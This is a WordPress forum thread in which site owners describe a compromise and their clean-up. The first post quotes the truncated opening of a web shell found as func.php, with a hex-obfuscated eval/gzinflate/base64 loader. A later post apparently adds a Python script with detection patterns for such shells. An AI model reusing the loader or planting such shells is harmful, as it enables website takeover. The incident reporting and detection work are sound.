
I Think a Hack Added func.php to My Theme Files (5 posts)

  1. melissadonovan
    Member
    Posted 2 years ago

    I stuck my head under the hood of my website because Feedburner suddenly stopped recognizing my feed. As I was going through my php files to clean out the white space, I found an unfamiliar file: func.php

    The code is enormous but here's how it started:

    <?php
    $auth_pass = "8a4bf282852bf4c49e17f0951f645e72";
    $color = "#df5";
    $default_action = "FilesMan";
    $default_charset = "Windows-1251";
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAl

    I deleted the file but am still researching to see if anyone else has experienced this. I did notice the file seems to have been added on 8/31/11. My site has had numerous, sudden problems in the past week: feed stopped updating, extreme decrease in traffic, etc.

    Anyway, I'm worried this hack has added files or code elsewhere on my site (I do not understand the code in the func.php file at all).

    Has anyone seen this before? Any ideas about how to clean out any malicious code it has generated?

  2. Jackson
    Member
    Posted 2 years ago

    Yikes, that doesn't look good.

    I would operate under the assumption that your site has been compromised and there may have been backdoors installed which will allow the attacker to return.

    Here's a good resource to start:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    A good tool for quickly identifying obvious malicious files left behind is Exploit Scanner, http://wordpress.org/extend/plugins/exploit-scanner/

    But you still really need to reinstall from clean backups to be safe.

  3. melissadonovan
    Member
    Posted 2 years ago

    This turned out to be a hack. From what I have read, this hack adds back doors to all your domains and probably enters via a plugin. Yes, all of your domains. I thought I'd document some of my findings and solutions here in case anyone else has this problem.

    Here were the clues that something was wrong:

    -Feedburner feed stopped updating. Says feed invalid but feed validator says feed is fine. Nothing seemed to be wrong with the feed but Feedburner rejected it.
    -Sudden, severe drop in traffic. My traffic decreased by over 75%.
    -Rank on search engines decreased dramatically. In some cases from top three positions to page five or lower.
    -Obviously, lowered revenue as a result of traffic and search engine rank decreases

    Here are some of the signs of the hack:

    -The first sign was that nothing worked to fix my feed and there didn't appear to be anything wrong with it.
    -I found an unknown php file in my theme folder. The file was titled func.php. Details in my original post at the top of this thread.
    -I deleted that file immediately and changed all my passwords for any account or user that can access my sites.
    -Contacted my host to see if they could help. They sent me a list of files they found to have been hacked (I'll paste the list at the bottom of this post). These were all WordPress files in my index plus one plugin file. Note: I had already deleted several plugins, which may have also been hacked.
    -These findings applied to all my websites under one FTP user, which was pretty scary.

    Here are the fixes (as best I can remember):

    -First, I changed all passwords that access WordPress, FTP, databases, etc.
    -Deactivate and delete ANY unnecessary plugins.
    -Via FTP, I found unfamiliar php files on my domains with names like Siegfried_allegra.php, _cat_hyacinthia.php, and also some quickstart.html files. I deleted all of these. They appear to be the back doors that hackers use to get in.
    -Next I removed the harmful code from all the php files for WordPress (see list of files below). This bad code was inserted at the beginning of those php files and looked a lot like the code snippet I pasted in the first post of this thread. Reloaded the fixed pages.
    -Finally, I reset all my passwords again.

    Then, I went to Feedburner and discovered that it now recognized my feed, which is a good sign, since that was the first alert that something was wrong.

    Here is the list of files that contained hack code:

    /wp-config.php
    /wp-rdf.php
    /wp-rss.php
    /wp-content/plugins/google-analytics-for-wordpress/press.php
    /wp-links-opml.php
    /wp-signup.php
    /wp-trackback.php
    /wp-load.php
    /wp-mail.php
    /wp-rss2.php
    /wp-comments-post.php
    /wp-activate.php
    /xmlrpc.php
    /wp-feed.php
    /wp-blog-header.php
    /index.php
    /wp-config-sample.php
    /wp-register.php
    /wp-atom.php
    /wp-cron.php
    /wp-commentsrss2.php
    /wp-pass.php
    /wp-app.php
    /wp-settings.php
    /wp-login.php

    If anyone else has this problem, I hope this helps.
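    The clean-up above boils down to two checks that can be scripted: look for the tell-tale constructs from the snippet at the top of the thread (a preg_replace() call with the /e modifier, an eval() wrapped around gzinflate()/base64_decode(), a $auth_pass hash, the "FilesMan" action), and compare every file against a known-good copy of the same WordPress release so that modified core files and unknown files (func.php, Siegfried_allegra.php, quickstart.html, a doc.php dropped in a plugin's temp directory) stand out. The script below is an added example written for this thread; it is not code from WordPress, from Exploit Scanner or from any poster. The file names, the placeholder hash and the sample file contents are constructed for the demonstration, and the "injected" prefix reuses only the hex-escape run quoted in the first post with a placeholder where the payload would be. The clean manifest is assumed to be a table of SHA-256 hashes taken from a pristine copy of the same WordPress version.

```python
"""Triage helper for a suspected WordPress compromise (added example)."""
import hashlib
import os
import re
import tempfile

# Indicators drawn from the snippet in this thread: a preg_replace() with the
# /e modifier, eval() over a decoder, a $auth_pass md5-style hash, "FilesMan".
INDICATORS = [
    ("preg_replace_e", re.compile(r"""preg_replace\s*\(\s*["'][^"']*/e["']""", re.I)),
    ("eval_of_decoder", re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)),
    ("auth_pass_hash", re.compile(r"""\$auth_pass\s*=\s*["'][0-9a-f]{32}["']""", re.I)),
    ("filesman_marker", re.compile(r"\bFilesMan\b")),
]
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_hex_escapes(text):
    """Turn "\\x65\\x76\\x61\\x6C" into "eval" so hex-obfuscated calls match too."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def scan_text(text):
    """Return the names of the indicators present in one PHP/HTML source string."""
    decoded = decode_hex_escapes(text)
    return [name for name, rx in INDICATORS if rx.search(text) or rx.search(decoded)]


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def scan_tree(root, clean_manifest):
    """Walk root and report three things: files carrying indicators, known
    files whose hash no longer matches the clean manifest (code prepended to
    wp-load.php and friends), and files the manifest never listed (the
    thread's func.php, Siegfried_allegra.php, quickstart.html, doc.php)."""
    report = {"indicators": {}, "modified": [], "unknown": []}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as f:
                data = f.read()
            if fn.lower().endswith((".php", ".html")):
                hits = scan_text(data.decode("utf-8", errors="replace"))
                if hits:
                    report["indicators"][rel] = hits
            if rel not in clean_manifest:
                report["unknown"].append(rel)
            elif sha256_bytes(data) != clean_manifest[rel]:
                report["modified"].append(rel)
    for key in ("modified", "unknown"):
        report[key].sort()
    return report


# Constructed sample files (stand-ins, not real WordPress sources).  The
# "injected" prefix reuses only the hex-escape run quoted in the thread, which
# decodes to eval(gzinflate(base64_decode( , with a placeholder for the payload.
CLEAN_FILES = {
    "index.php": "<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-load.php": "<?php\ndefine('ABSPATH', __DIR__ . '/');\n",
    "wp-includes/version.php": "<?php\n$wp_version = 'x.y.z';\n",
}
INJECTED_PREFIX = (r'''<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E'''
                   r'''\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63'''
                   r'''\x6F\x64\x65\x28'PLACEHOLDER'\x29\x29\x29\x3B","."); ?>''' + "\n")
FAKE_SHELL = ('<?php\n$auth_pass = "00000000000000000000000000000000";\n'  # placeholder hash
              '$default_action = "FilesMan";\n')


def build_sample_tree(root):
    """Write the constructed tree under root and return the clean manifest."""
    tree = dict(CLEAN_FILES)
    tree["wp-load.php"] = INJECTED_PREFIX + CLEAN_FILES["wp-load.php"]
    tree["wp-content/themes/mytheme/func.php"] = FAKE_SHELL
    tree["wp-content/quickstart.html"] = "<html><body>nothing here</body></html>\n"
    for rel, text in tree.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(text.encode("utf-8"))
    return {rel: sha256_bytes(text.encode("utf-8")) for rel, text in CLEAN_FILES.items()}


def demo():
    """Build the sample tree in a temp dir, scan it and return the report."""
    with tempfile.TemporaryDirectory() as root:
        manifest = build_sample_tree(root)
        return scan_tree(root, manifest)


if __name__ == "__main__":
    for section, value in demo().items():
        print(section, value)
```

    Run against a real install by pointing scan_tree() at the document root and passing a manifest built from a freshly downloaded copy of the same release; anything in "modified" or "unknown" is what to inspect or replace, and the indicator list is deliberately narrow, so a clean result is not proof of a clean site. This is why the advice above to reinstall from clean backups and rotate every password still stands.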

  4. melissadonovan
    Member
    Posted 2 years ago

    I wanted to add a few notes of interest about this hack:

    1. I ran the Google Webmasters malware detection and it did not find anything; however, the Google search engine appears to have detected the malware because it penalized my rankings.

    2. Feed validator and XML validator did not recognize any malicious code but Feedburner most definitely did.

    Also, another red flag was that my crawl stats showed a drastic increase in crawl time (maybe this is what penalized my site with search engines). It looks like crawl time increased by over 300%.

  5. remino
    Member
    Posted 2 years ago

    Just to let you know, my site was compromised too. A hacker uploaded a doc.php file in /wp-content/plugins/si-contact-form/captcha/temp, with which I assume the same hacker wrote the theme.php (not func.php for me) in /wp-content/themes/twentyeleven. After that, a separate spam WordPress site was installed in /wp-includes/js/saw, which was connected to an external database.

Topic Closed

This topic has been closed to new replies.
